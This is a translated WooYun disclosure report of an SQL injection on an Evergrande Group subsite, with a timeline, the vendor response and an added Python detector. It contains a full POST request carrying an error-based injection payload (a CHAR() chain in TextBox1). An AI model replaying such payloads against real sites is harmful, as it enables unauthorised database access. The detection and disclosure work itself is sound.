Vulnerability summary

Defect ID: wooyun-2015-0150879

Title: SQL injection on an Evergrande Group subsite

Vendor: Evergrande Group (恒大集团)

Author: 霝z

Submitted: 2015-11-01 20:51

Fixed: 2015-12-20 14:50

Published: 2015-12-20 14:50

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed over to a third-party partner organization (CNCERT, the National Computer Network Emergency Response Technical Team) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability details

Disclosure status:

2015-11-01: Details sent to the vendor, awaiting vendor handling
2015-11-05: Vendor confirmed; details visible to the vendor only
2015-11-15: Details disclosed to core white hats and relevant domain experts
2015-11-25: Details disclosed to regular white hats
2015-12-05: Details disclosed to intern white hats
2015-12-20: Details disclosed to the public

Brief description:

Roughly 10 databases are involved.

Details:

1. Injection point:

POST /postsearch.aspx HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://**.**.**.**
Referer: http://**.**.**.**/postsearch.aspx
Accept-Language: en-us,en;q=0.5
Host: **.**.**.**
Cookie: ASP.NET_SessionId=tc300dsnjcaeth2ssciulg5j; safedog-flow-item=0AE14BCB0CC9D9FC79FF7D5F6337A4F1
Accept-Encoding: gzip, deflate
Content-Length: 8671
Content-Type: application/x-www-form-urlencoded
__VIEWSTATE=[long base64 ASP.NET ViewState value omitted]&__EVENTTARGET=AspNetPager1&__EVENTARGUMENT=2&__EVENTVALIDATION=%2fwEWAwLSvqqgDwLs0bLrBgKM54rGBonDAVWbvdIaXBjT8dT8OL73b9rqQMEDEhi9msER9j56&TextBox1=%27AND+1%3d(CHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))%2b%27


2. Injected parameter:

(screenshot: pa.jpg)


3. Databases involved:

(screenshot: db.jpg)

Proof of vulnerability:

(screenshot: shell.jpg)


Did not go any further.

Fix recommendation:

Filter the input.
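As an added example (not part of the original report), a small Python checker that decodes the POST body of the request above and flags the TextBox1 value: it reconstructs the string the CHAR() chain builds, which is what a log-review or WAF rule has to see through, because the chain contains no quoted literal for a naive keyword filter to match. The sample body is a constructed copy of the report's request with the ViewState and EventValidation values replaced by placeholders.

```python
import re
from urllib.parse import parse_qs

# Constructed sample: the form body from the report, with the opaque
# ASP.NET ViewState / EventValidation values replaced by placeholders.
SAMPLE_BODY = (
    "__VIEWSTATE=PLACEHOLDER&__EVENTTARGET=AspNetPager1&__EVENTARGUMENT=2"
    "&__EVENTVALIDATION=PLACEHOLDER"
    "&TextBox1=%27AND+1%3d(CHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)"
    "%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)"
    "%2bCHAR(109)%2bCHAR(97))%2b%27"
)

# A run of CHAR(n)+CHAR(n)+... : a string literal assembled without quotes.
CHAR_CHAIN = re.compile(r"(?:CHAR\(\d{1,3}\)\s*\+\s*)+CHAR\(\d{1,3}\)", re.I)
# A quote that closes the original literal followed by a boolean operator:
# the shape of a string-context boolean / error-based probe.
QUOTE_BOOL = re.compile(r"'\s*(?:AND|OR)\b", re.I)


def decode_char_chain(expr: str) -> str:
    """Return the string a T-SQL CHAR(n)+CHAR(n)+... chain evaluates to."""
    return "".join(chr(int(n)) for n in re.findall(r"CHAR\((\d{1,3})\)", expr, re.I))


def flag_sqli_params(body: str) -> dict:
    """Map each suspicious form field to the decoded marker it carries.

    parse_qs undoes the URL encoding ('%27' -> quote, '%2b' -> '+'), so the
    patterns run on what the database would actually receive.  For the
    report's request the comparison becomes 1 = '_!@2dilemma'; on SQL Server
    that forces a failed int conversion whose error text echoes the marker,
    which is why raw database errors must never reach the client and why
    the query should be parameterized rather than merely 'filtered'.
    """
    hits = {}
    for name, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            if QUOTE_BOOL.search(value):
                chain = CHAR_CHAIN.search(value)
                hits[name] = decode_char_chain(chain.group(0)) if chain else ""
    return hits


if __name__ == "__main__":
    print(flag_sqli_params(SAMPLE_BODY))  # {'TextBox1': '_!@2dilemma'}
```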

Copyright notice: please credit 霝z@乌云 when reposting.


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2015-11-05 14:48

Vendor reply:

CNVD confirms the described vulnerability; no direct handling channel with the website's operating unit has been established yet, pending claim.

Latest status:

None yet


Comments:

  1. 2015-11-03 11:10 | 李叫兽就四李叫兽 ( Intern white hat | Rank:58 Vulnerabilities:8 | 啦啦啦啦)

    Five straight Chinese Super League titles, and another AFC Champions League crown... gogogoog